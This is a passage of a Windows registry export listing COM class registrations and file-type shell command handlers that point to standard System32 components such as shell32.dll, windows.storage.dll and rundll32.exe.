HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\windows.storage.dll,-51409 System.ItemNameDisplayWithoutExtension REG_EXPAND_SZ @%SystemRoot%\system32\Windows.Storage.dll,-51409 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F827EC16-664E-4B05-878C-02D242229094}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CloudNotifications.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Syncreg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F82DF8F7-8B9F-442E-A48C-818EA735FF9B} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\tabletpc.cpl,-10105 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\tabletpc.cpl,-10103 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F82DF8F7-8B9F-442E-A48C-818EA735FF9B}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\tabletpc.cpl,-10201 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F82DF8F7-8B9F-442E-A48C-818EA735FF9B}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\tabletpc.cpl @0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F82EFF51-99FA-4393-A31D-6D5D9F3972C3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F8383852-FCD3-11d1-A6B9-006097DF5BD4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f83cbf45-1c37-4ca1-a78a-28bcb91642ec}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f85d5d94-6851-44f7-bb3a-bfd0949abf1d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a} Infotip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-12690 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-189 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\slui.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F885120E-3789-4fd9-865E-DC9B4A6412D2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F8900A80-4885-4722-A655-7A60F7596E3A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UpdateCsp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\softkbd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlidcredprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F8A1793B-7873-4046-B2A7-1F318747F427}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\fidocredprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f8a56d3e-e304-4a9f-a916-5187019d7759}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\bcdprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f8c2ab3b-17bc-41da-9758-339d7dbf2d88}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f8d1da80-9aea-4ca4-ba41-bee6fca037b1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F8D253D9-89A4-4daa-87B6-1168369F0B21} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63524 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F90B5F36-367B-402A-9DD1-BC0FD59D8F62}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F90FE5FE-E88B-4578-9C81-79210FD53D41}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f91b9abc-985b-4c04-b5e7-9c7099fc2cda}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\adprovider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F94CDF40-02D6-4E79-89F7-B5357F3B1A39}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F975AF2C-9A51-4AF0-91EA-06038698CE38}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F9A7AB61-C0BC-490e-A7FE-BFF26B327A3F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f9bcb2f0-7df0-4a39-932e-bdef29dfb16b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\authui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F9EBBF2D-0C5D-4BF1-AE24-A30F7796D178}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SyncInfrastructurePS.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FA06375D-F0A4-4A47-AD8D-148595F1E0B8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FA2C37A7-2D1E-444F-AD7B-D946823A7072}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fa61e9f8-580e-4575-ab01-4a62c31fcf43}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FA735D10-205D-451B-9EE8-E171F2214EF0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FA77A74E-E109-11D0-AD6E-00C04FD8FDFF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\stdprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FA869D29-BA80-4D7D-A867-0DF126F980A5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FA9342F0-B15B-473C-A746-14FCD4C4A6AA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\azroleui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fa996453-47cf-4e5a-8df6-67f93a046ebb}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FAC1D9C0-0296-11D1-A840-00A0C92C9D5D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmdskmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fad63700-aafb-463a-8c1f-4c2dbc28ae57}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FAF53CC4-BD73-4E36-83F1-2B23F46E513E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\System32\ES.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FB012959-F4F6-44D7-9D09-DAA087A9DB57}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FB11047A-4051-4d1d-9DCA-C80C5DF98D70}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FB1E042E-6772-4834-B1BF-F03F120E5F36}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FB2FDC4F-7DD0-4ACE-9B1E-36E5C2F98D27}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WLanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FB40360C-547E-4956-A3B9-D4418859BA66}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fb479c02-9ec4-4fed-8599-debe037452cb}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {fb479c02-9ec4-4fed-8599-debe037452cb} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FB67F8D9-03A1-42b5-979A-1577F0193611}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FBDBD7C2-8E45-4468-A76C-8C832456E850}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\MergedFolder ConflictOverlayIcon REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-169 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fbebb71b-a592-4880-b096-9429ebe119db}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\L2SecHC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\ieframe.dll,-34560 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FC220AD8-A72A-4EE8-926E-0B7AD152A020}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FC31D09D-D059-4551-9A28-B88A4181EC29}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FC46B571-5D16-4DCE-8F26-F7138C09C768}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FC47060E-6153-4B34-B975-8E4121EB7F3C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FC5B8A24-DB05-4A01-8388-22EDF6C2BBBA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\bidispl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FC5EEAF6-2001-11DF-ADB9-F4CE462D9137}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wifinetworkmanager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FC80316A-0752-400d-AA2E-86DE4F6C26EF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FCA7405F-710E-4438-ADEE-FB35BBF9BACD}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CredProv2faHelper.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fcc2867c-69ea-4d85-8058-7c214e611c97}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tssessionux.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FCC74B77-EC3E-4dd8-A80B-008A702075A9} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\appwiz.cpl,-162 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FCC74B77-EC3E-4dd8-A80B-008A702075A9}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\imageres.dll,-87 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FCC74B77-EC3E-4dd8-A80B-008A702075A9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fccf70c8-f4d7-4d8b-8c17-cd6715e37fff}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FCDC2CF5-ABCD-4BA5-94DA-1823AE06FE2B} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\corrEngine.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FCDC2CF5-ABCD-4BA5-94DA-1823AE06FE2B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\corrEngine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD209E2E-813B-41C0-8646-4C3E9C917511}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\ipmiprv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD215A13-A26A-44FF-BA3A-9109F278E28F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmpeg2srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD30033D-C508-491E-AE43-0075E46DED83}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msctfuimanager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD30583B-C085-4B28-9D77-0185C987CC13}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WpcApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD4F53E0-65DC-11D1-AB64-00C04FD9159E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\ntevt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD688BBD-31ED-4DB7-A723-934927D38367}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD76C304-255F-4446-A895-6E1967EC4FDC}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SrpUxNativeSnapIn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD78DA08-2964-40BF-AE00-72EA8155CB53}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MSVideoDSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fd8d3a5f-6066-11d1-8c13-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsmsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fd8d7f86-2f0c-43bb-b225-97ac3c04567b}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FDA74D11-C4A6-4577-9F73-D7CA8586E10C}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ProximityUxHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FDD384CC-78C6-4E6D-8694-1DACBEE57F96}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\System32\hnetcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FDDB1402-6A7D-4044-B85B-3AC449824BE8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fe081f7f-67dc-4f4e-a74a-d6555cdc8efb}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpnapps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fe1290f0-cfbd-11cf-a330-00aa00c16e65} (Default) REG_EXPAND_SZ @%SystemRoot%\system32\dsquery.dll,-553 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FE217CB2-0B2C-48c9-90CA-8D8BCA79248D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fe5afcf2-e681-4ada-9703-ef39b8ecb9bf}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fe7c0d2b-27f1-4e97-951b-cf6e165eeab6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tsmf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FE883157-CEBD-4570-B7A2-E4FE06ABE626}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsecedit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FE92BB18-77C1-451A-83E8-8420D74E4B1C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FE9AF5C0-D3B6-11CE-A5B6-00AA00680C3F}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\stdprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FEA4300C-7959-4147-B26A-2377B9E7A91D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsound.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FED4ACC3-87C9-45E9-A026-5B59A855E687}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AUDIOENG.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FEF10FA2-355E-4e06-9381-9B24D7F7CC88}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FF036D13-5D4B-46DD-B10F-106693D9FE4F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ff183a37-b6da-4d32-bb24-157b282ffa48}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FF2A742B-CA25-4507-BD93-6BA9B8E8965F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WLanHC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FF302BD3-3DC6-4680-9384-621A7FF574F4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.UI.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ff363bfe-4941-4179-a81c-f3f1ca72d820}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FF3AE31D-55B0-4945-BDE9-622ABB334C1A}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\WABSyncProvider.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FF3AE31D-55B0-4945-BDE9-622ABB334C1A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WABSyncProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ff609cc7-d34d-4049-a1aa-2293517ffcc6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\stobject.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ff679da1-8ff2-4474-9c9e-52bbd409b557}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ff8a32e3-a9a7-4093-b9c4-5b5b4f30ab63}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ff8a71c2-7eb8-418b-950d-3b49f43f024f}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wincredprovider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FF99E1C1-7F9A-4C83-8A57-305992EDD07B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ff9e6131-a8c1-4188-aa03-82e9f10a05a8} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-50197 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ff9e6131-a8c1-4188-aa03-82e9f10a05a8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FFB8655F-81B9-4fce-B89C-9A6BA76D13E7}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {FFB8655F-81B9-4fce-B89C-9A6BA76D13E7} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ffe1df5f-9f06-46d3-af27-f1fc10d63892} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\hgcpl.dll,-4 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ffe1df5f-9f06-46d3-af27-f1fc10d63892}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\imageres.dll,-1013 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ffe1df5f-9f06-46d3-af27-f1fc10d63892}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\acppage.dll,-6003 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-68 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\runas\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmd.exe /C "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-8464 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll,2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\zipfldr.dll,-10195 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder\Shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cplfile\shell\cplopen\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\control.exe "%1",%* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cplfile\shell\runas\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,Control_RunDLLAsUser "%1",%* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CRLFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddCRL %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CRLFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\curfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-8465 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DesktopBackground\Shell\Display (Default) REG_EXPAND_SZ @%SystemRoot%\System32\display.dll,-4 Icon REG_EXPAND_SZ %SystemRoot%\System32\display.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DesktopBackground\Shell\Personalize (Default) REG_EXPAND_SZ @%systemroot%\system32\themecpl.dll,-10 Icon REG_EXPAND_SZ %systemroot%\system32\themecpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\desktopthemepackfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll,-704 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\desktopthemepackfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\AllItems\Shell\Microsoft.DxpOpen\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\AllItems\Shell\Microsoft.DxpOpenInNewWindow\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\InterfaceClass\{0850302A-B344-4fda-9BE9-90576B8D46F0}\Shell\Bluetooth\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\bthprops.cpl,,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\InterfaceClass\{70FFD812-4C7F-4C7D-926A-637B7DD852AF}\Shell\DeviceInstall\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\newdev.dll,DeviceInternetSettingUi 2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\InterfaceClass\{884b96c3-56ef-11d1-bc8c-00a0c91405dd}\Shell\Regional\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\control.exe 